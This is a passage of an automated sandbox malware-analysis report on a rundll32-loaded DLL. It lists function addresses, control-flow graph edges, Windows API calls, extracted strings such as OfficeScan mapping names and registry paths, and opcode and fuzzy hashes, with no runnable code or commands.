180005ee3-180005eef 411->414 417 180005ef0-180005ef9 414->417 417->417 418 180005efb-180005f08 call 180005250 417->418 418->343 421 180005f0e-180005f11 418->421 422 180005f13-180005f22 CharNextW 421->422 423 180005f24-180005f2a 421->423 422->422 422->423 423->368
                                                                                                                      APIs
                                                                                                                      • CoTaskMemAlloc.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005C60
                                                                                                                      • wcsstr.LIBVCRUNTIME ref: 0000000180005CCD
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005CDF
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005CEB
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005CF7
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005D03
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005D61
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005DDD
                                                                                                                      • CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005E12
                                                                                                                        • Part of subcall function 00000001800056C0: CharNextW.USER32 ref: 00000001800056D3
                                                                                                                      • lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005E9F
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005F16
                                                                                                                      • CharNextW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000001800067C4), ref: 0000000180005F32
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$Task$AllocFreelstrcmpiwcsstr
                                                                                                                      • String ID: }}$HKCR$HKCU{Software{Classes$REGISTRY
                                                                                                                      • API String ID: 2678557286-2791478717
                                                                                                                      • Opcode ID: d6952ec5bd2a17902043c70f842be37df4190b69f8620cff9adf972c45d68580
                                                                                                                      • Instruction ID: bbdfaccdea3bba81881f4aa5ee89a92688eb783e9208bb5ac5d175e121a00dd0
                                                                                                                      • Opcode Fuzzy Hash: d6952ec5bd2a17902043c70f842be37df4190b69f8620cff9adf972c45d68580
                                                                                                                      • Instruction Fuzzy Hash: CCB19232205B4885EBA6DB21E4543AA33A0F74CBD6F509525FADE477D4EF78C7488740
                                                                                                                      Function 000000018000C110 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 231filethreadCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 882 18000c110-18000c152 883 18000c154-18000c159 882->883 884 18000c15e-18000c18f CreateFileW 882->884 885 18000c432-18000c458 call 18000da80 883->885 886 18000c195-18000c1b1 GetFileSizeEx 884->886 887 18000c42b 884->887 888 18000c1b7-18000c20f GetCurrentProcessId GetCurrentThreadId call 1800085d0 call 180002ce0 886->888 889 18000c420-18000c429 CloseHandle 886->889 890 18000c430 887->890 897 18000c211-18000c227 888->897 898 18000c247-18000c289 CreateFileMappingW 888->898 889->890 890->885 899 18000c242 call 18000d628 897->899 900 18000c229-18000c23c 897->900 901 18000c3cf-18000c3d9 GetLastError 898->901 902 18000c28f-18000c2bc 898->902 899->898 900->899 905 18000c45f-18000c464 call 180011aec 900->905 903 18000c3e4-18000c3ec 901->903 904 18000c3db-18000c3de 901->904 907 18000c2c0-18000c2c8 902->907 903->889 909 18000c3ee-18000c404 903->909 904->903 915 18000c465-18000c46a call 180011aec 905->915 907->907 910 18000c2ca-18000c2e1 call 1800085d0 907->910 912 18000c406-18000c419 909->912 913 18000c41b call 18000d628 909->913 921 18000c2e6-18000c2ee 910->921 912->913 916 18000c459-18000c45e call 180011aec 912->916 913->889 926 18000c46b-18000c470 call 180011aec 915->926 916->905 921->921 922 18000c2f0-18000c33a call 1800085d0 call 18000ca00 921->922 932 18000c372-18000c38c 922->932 933 18000c33c-18000c352 922->933 936 18000c3c4-18000c3cd CloseHandle 932->936 937 18000c38e-18000c3a4 932->937 934 18000c354-18000c367 933->934 935 18000c36d call 18000d628 933->935 934->915 934->935 935->932 936->903 939 18000c3a6-18000c3b9 937->939 940 18000c3bf call 18000d628 937->940 939->926 939->940 940->936
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CreateCurrent$MappingProcessSizeThread
                                                                                                                      • String ID: OfficeScan-%u-%u
                                                                                                                      • API String ID: 1334661976-1227074125
                                                                                                                      • Opcode ID: c944cfb7fab92ac0311fe24493515b38dafa1cb6b3d5034ff05c7775568ff91c
                                                                                                                      • Instruction ID: f95e6d22b5e4b53b0f1e4e57d2c4d13b4ddeeb21717f079512e00d2e30ce1131
                                                                                                                      • Opcode Fuzzy Hash: c944cfb7fab92ac0311fe24493515b38dafa1cb6b3d5034ff05c7775568ff91c
                                                                                                                      • Instruction Fuzzy Hash: 4A91BB72B10B4486FB52DBA9E8447ED3361BB897E4F409315AE6953AD9EF38C24DC300
                                                                                                                      Function 000000018000CA00 Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 436COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 942 18000ca00-18000ca4a 943 18000ca56-18000cda6 call 180004140 call 180002900 call 180004400 call 180002900 call 180004400 call 180002900 call 180004400 call 180002900 call 180004400 call 180002900 call 180004400 call 180002900 call 180004400 call 180002840 call 180002900 call 180004400 call 180002840 call 180002900 call 180004400 call 180002840 call 180002900 call 180004400 call 180008cc0 call 180003d50 * 2 call 1800085d0 call 180001640 942->943 944 18000ca4c-18000ca51 942->944 1002 18000cdaa call 180001650 943->1002 946 18000ceb7-18000cede call 18000da80 944->946 1003 18000cdaf-18000cdba 1002->1003 1004 18000cdf2-18000cdf8 1003->1004 1005 18000cdbc-18000cdd2 1003->1005 1008 18000ce26 1004->1008 1009 18000cdfa-18000ce00 1004->1009 1006 18000cdd4-18000cde7 1005->1006 1007 18000cded call 18000d628 1005->1007 1006->1007 1011 18000cee5-18000cef3 call 180011aec 1006->1011 1007->1004 1010 18000ce2b-18000ce2e 1008->1010 1009->1008 1013 18000ce02-18000ce07 1009->1013 1015 18000ce46-18000ce4d 1010->1015 1016 18000ce30-18000ce45 call 180001220 call 18000d628 1010->1016 1026 18000cef9-18000cefc 1011->1026 1027 18000d0b0-18000d0dd 1011->1027 1017 18000ce09-18000ce0c 1013->1017 1018 18000ce1f-18000ce24 1013->1018 1023 18000ce65-18000ce6d 1015->1023 1024 18000ce4f-18000ce64 call 180001220 call 18000d628 1015->1024 1016->1015 1019 18000ce18-18000ce1d 1017->1019 1020 18000ce0e-18000ce11 1017->1020 1018->1010 1019->1010 1020->1008 1025 18000ce13-18000ce16 1020->1025 1028 18000ce9c-18000ceb5 call 180004400 1023->1028 1029 18000ce6f-18000ce80 1023->1029 1024->1023 1025->1010 1032 18000cf04-18000cf10 1026->1032 1033 18000cefe-18000cf03 1026->1033 1036 18000d0f6-18000d128 call 18000d8d4 1027->1036 1037 18000d0df-18000d0f5 1027->1037 1028->946 1034 18000ce82-18000ce95 1029->1034 1035 18000ce97 call 18000d628 1029->1035 1034->1035 1041 18000cedf-18000cee4 call 180011aec 1034->1041 1035->1028 1050 18000d12a-18000d16a 1036->1050 1051 18000d16c 1036->1051 1041->1011 1053 18000d16f-18000d195 1050->1053 1051->1053 1056 18000d197-18000d1b8 call 180007a40 1053->1056 1057 18000d1dd-18000d1f0 1053->1057 1060 18000d1ba-18000d1cc 1056->1060 1061 18000d1ce-18000d1d6 1056->1061 1060->1057 1060->1061 1061->1057
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \OfficeScanLPC$extraInfo$mapName$mappingHandle$objectName$objectType$scanType$size$sourceProcess$version
                                                                                                                      • API String ID: 0-295255216
                                                                                                                      • Opcode ID: d79e9de4eb6fea0678a29b6ca6e59e0546cf9f04dbcf4b616b7e8ba94308a403
                                                                                                                      • Instruction ID: 0d4fa4b774054f253373325e50542481224c0e6a607b19d5a8355063636d8abb
                                                                                                                      • Opcode Fuzzy Hash: d79e9de4eb6fea0678a29b6ca6e59e0546cf9f04dbcf4b616b7e8ba94308a403
                                                                                                                      • Instruction Fuzzy Hash: 44129A32705B888AEB42CB74E4803DC37B6A7497D8F548116EE8D27B9ADF34C659C780
                                                                                                                      Function 0000000180001E60 Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 394COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1063 180001e60-1800021a4 call 180004140 call 180002900 call 180004400 call 180002900 call 180004400 call 180002900 call 180004400 call 180002900 call 180004400 call 180002900 call 180004400 call 180002900 call 180004400 call 180002840 call 180002900 call 180004400 call 180002840 call 180002900 call 180004400 call 180008cc0 call 180003d50 * 2 call 1800085d0 call 180001640 1112 1800021a8 call 180001650 1063->1112 1113 1800021ad-1800021b8 1112->1113 1114 1800021ba-1800021d0 1113->1114 1115 1800021f0-180002202 1113->1115 1116 1800021d2-1800021e5 1114->1116 1117 1800021eb call 18000d628 1114->1117 1118 180002204 1115->1118 1119 180002206-180002209 1115->1119 1116->1117 1122 1800022cd-180002311 call 180011aec 1116->1122 1117->1115 1118->1119 1120 180002218 1119->1120 1121 18000220b-18000220e 1119->1121 1124 18000221b-180002238 call 180001220 call 18000d628 1120->1124 1121->1124 1125 180002210-180002216 1121->1125 1130 180002313-180002325 1122->1130 1131 180002326-180002353 call 18000d8d4 1122->1131 1138 18000223a-18000224f call 180001220 call 18000d628 1124->1138 1139 180002250-180002258 1124->1139 1125->1124 1136 180002355-18000237c 1131->1136 1137 18000237e 1131->1137 1140 180002381-1800023ac 1136->1140 1137->1140 1138->1139 1142 180002287-1800022c6 call 180004400 call 18000da80 1139->1142 1143 18000225a-18000226b 1139->1143 1152 1800023ae-1800023cb call 180007a40 1140->1152 1153 1800023f0-1800023ff 1140->1153 1147 180002282 call 18000d628 1143->1147 1148 18000226d-180002280 1143->1148 1147->1142 1148->1147 1149 1800022c7-1800022cc call 180011aec 1148->1149 1149->1122 1162 1800023e1-1800023e9 1152->1162 1163 1800023cd-1800023df 1152->1163 1162->1153 1163->1153 1163->1162
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0000000180002900: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180002A64
                                                                                                                        • Part of subcall function 0000000180002900: _CxxThrowException.LIBVCRUNTIME ref: 0000000180002AB6
                                                                                                                        • Part of subcall function 0000000180004400: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800044D3
                                                                                                                        • Part of subcall function 0000000180001650: RtlInitUnicodeString.NTDLL ref: 00000001800016E6
                                                                                                                        • Part of subcall function 0000000180001650: NtClose.NTDLL ref: 000000018000175A
                                                                                                                        • Part of subcall function 0000000180001650: NtClose.NTDLL ref: 0000000180001769
                                                                                                                        • Part of subcall function 0000000180001650: RtlNtStatusToDosError.NTDLL ref: 00000001800017A6
                                                                                                                        • Part of subcall function 0000000180001650: SetLastError.KERNEL32 ref: 00000001800017AE
                                                                                                                        • Part of subcall function 0000000180001650: LocalFree.KERNEL32 ref: 00000001800017C6
                                                                                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800022C7
                                                                                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800022CD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$CloseError$ExceptionFreeInitLastLocalStatusStringThrowUnicode
                                                                                                                      • String ID: \OfficeScanLPC$mapName$mappingHandle$objectName$objectType$scanType$size$sourceProcess$version
                                                                                                                      • API String ID: 3005093427-2404656728
                                                                                                                      • Opcode ID: 28c97f36d74b1a47469f08ade993c45906df21fe725b4018bed03fb5b85ac439
                                                                                                                      • Instruction ID: 0be3e0bb8fe5a8c08eeb416419ac2ac58a0f85e131ad06a8c39d6188d6196533
                                                                                                                      • Opcode Fuzzy Hash: 28c97f36d74b1a47469f08ade993c45906df21fe725b4018bed03fb5b85ac439
                                                                                                                      • Instruction Fuzzy Hash: 65029D33701B8889EB42CFB5E4903DC37B6A759798F458116EF896BB99DE38C619C340
                                                                                                                      Function 0000000180017F94 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 104COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                      • API String ID: 3215553584-2617248754
                                                                                                                      • Opcode ID: c9ef68fe15a0685817e053870e5daca4dfe2efa88dc6a2da75efcd8cea66df82
                                                                                                                      • Instruction ID: 72066f0b29f8277b2a9d0f30e9ba564a046d601e49a7b5146efbfedbbbc13b8a
                                                                                                                      • Opcode Fuzzy Hash: c9ef68fe15a0685817e053870e5daca4dfe2efa88dc6a2da75efcd8cea66df82
                                                                                                                      • Instruction Fuzzy Hash: 2E417C36701F48C9EB82CF65E8507CD33A5FB183C8F458526EA5817B99EE79C629D380
                                                                                                                      Function 00000001800225B0 Relevance: 15.1, APIs: 10, Instructions: 134COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Event$CloseHandle$Create$ObjectOpenResetSingleWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3951656645-0
                                                                                                                      • Opcode ID: af9c93ba574bc1ec99061f54b08a1be15c7d393e5603cbaa728536fe020de9dc
                                                                                                                      • Instruction ID: a4ca4c93f823217d94e31494ce8624a3760039f8ad707e5135abf709fc427eeb
                                                                                                                      • Opcode Fuzzy Hash: af9c93ba574bc1ec99061f54b08a1be15c7d393e5603cbaa728536fe020de9dc
                                                                                                                      • Instruction Fuzzy Hash: 9251963220868496EB93CBA0E55439EB7A1F78D7F4F548311FAB947AD8DF79C5488B00
                                                                                                                      Function 0000000180005590 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                                                                      • API String ID: 1646373207-1053001802
                                                                                                                      • Opcode ID: 47b834d62431e17e20a977250de26ae495141b3d13ed43af52be611b2e9d5c14
                                                                                                                      • Instruction ID: 963a9f0c5cad83c64c799a194dce8767f8060a1849f79d87e2b9da9312d231c1
                                                                                                                      • Opcode Fuzzy Hash: 47b834d62431e17e20a977250de26ae495141b3d13ed43af52be611b2e9d5c14
                                                                                                                      • Instruction Fuzzy Hash: 3C316C36615A4881EB93CB05E8543DA77A0E74DBD5F98C421EF8C077A4DF3AC699C704
                                                                                                                      Function 0000000180021160 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 282COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • bad allocation, xrefs: 00000001800211B1
                                                                                                                      • C:\vcpkg\installed\x64-windows-static\include\boost/exception/detail/exception_ptr.hpp, xrefs: 0000000180021312
                                                                                                                      • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 0000000180021307
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __std_exception_copy$__std_exception_destroy
                                                                                                                      • String ID: C:\vcpkg\installed\x64-windows-static\include\boost/exception/detail/exception_ptr.hpp$bad allocation$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                                                      • API String ID: 3351419955-2811268555
                                                                                                                      • Opcode ID: 38fb148bf62251cd46b3e688b822faa1bb8ec711d66c6ffaa433cc5f8242a4f5
                                                                                                                      • Instruction ID: 89612ad2f0a4dbe3d37bcdf88216a6aca8c5db91f2faee7b5b62cc2b8fe9d8d9
                                                                                                                      • Opcode Fuzzy Hash: 38fb148bf62251cd46b3e688b822faa1bb8ec711d66c6ffaa433cc5f8242a4f5
                                                                                                                      • Instruction Fuzzy Hash: FBD12632701B488AEB92CF65E8803DD73B5F749B99F158126EA4D53B68EF38C658C740
                                                                                                                      Function 00000001800215C0 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 282COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 0000000180021767
                                                                                                                      • bad exception, xrefs: 0000000180021611
                                                                                                                      • C:\vcpkg\installed\x64-windows-static\include\boost/exception/detail/exception_ptr.hpp, xrefs: 0000000180021772
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __std_exception_copy$__std_exception_destroy
                                                                                                                      • String ID: C:\vcpkg\installed\x64-windows-static\include\boost/exception/detail/exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                                                      • API String ID: 3351419955-1136627154
                                                                                                                      • Opcode ID: 29ae3109d19782a05870721eee5e20d4c2552882acae7008d5f6f4f657ea7566
                                                                                                                      • Instruction ID: 5d69a4a317d418ad0cd9793c46078c486c87dd547ad8dbe9c107f65695df127c
                                                                                                                      • Opcode Fuzzy Hash: 29ae3109d19782a05870721eee5e20d4c2552882acae7008d5f6f4f657ea7566
                                                                                                                      • Instruction Fuzzy Hash: 0DD13532601B488AEB92CF65E8903DD73B4F789B99F158126EE4D43768EF38C658C740
                                                                                                                      Function 000000018000A640 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 233COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Module$[json.exception.
                                                                                                                      • API String ID: 0-4049947260
                                                                                                                      • Opcode ID: 36d6bd7ae6ad30d832d8142fd754482a29e78ae3e058fae6e904548c9c85cd86
                                                                                                                      • Instruction ID: fe7089d107aa8f68835dacd8c69746321219263d80d134f090ae36b3a29a05ef
                                                                                                                      • Opcode Fuzzy Hash: 36d6bd7ae6ad30d832d8142fd754482a29e78ae3e058fae6e904548c9c85cd86
                                                                                                                      • Instruction Fuzzy Hash: 73A18072B14B888AFB46CB79D4153DC3322E7997D8F409611EA5C27B9ADF74C289C380
                                                                                                                      Function 00000001800076B0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 229COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Module$FileHandleName__report_securityfailure_invalid_parameter_noinfo
                                                                                                                      • String ID: Module$Module_Raw$REGISTRY
                                                                                                                      • API String ID: 853233465-549000027
                                                                                                                      • Opcode ID: a14a019abaa2f50d255da567a2426ae732f2bbcede54e071cb80226dfd2780e6
                                                                                                                      • Instruction ID: 731c98ac08b5e8395c75feb44ddf7eed7338f20cafd795188727a8ce6c68b874
                                                                                                                      • Opcode Fuzzy Hash: a14a019abaa2f50d255da567a2426ae732f2bbcede54e071cb80226dfd2780e6
                                                                                                                      • Instruction Fuzzy Hash: 9891BE32715B8885EB96DB20E4803EA73A0FB987D0F849511BA8E476A6DF3CC749C741
                                                                                                                      Function 00000001800058E0 Relevance: 10.6, APIs: 7, Instructions: 131COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext
                                                                                                                      • String ID:
